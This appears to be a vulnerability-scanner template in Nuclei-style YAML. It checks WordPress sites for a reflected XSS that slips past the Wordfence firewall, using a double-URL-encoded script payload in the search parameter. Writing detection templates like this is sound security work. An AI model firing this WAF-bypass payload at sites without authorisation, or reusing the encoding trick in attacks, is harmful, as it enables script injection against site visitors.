id: wordpress-wordfence-waf-bypass-xss

info:
  author: hackergautam
  name: Wordfence WAF Bypass WordPress XSS
  reference: https://twitter.com/naglinagli/status/1382082473744564226
  severity: medium
  tags: wordpress,wordfence,xss

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?s=ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - <script>alert(document.domain)</script>
        part: body

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200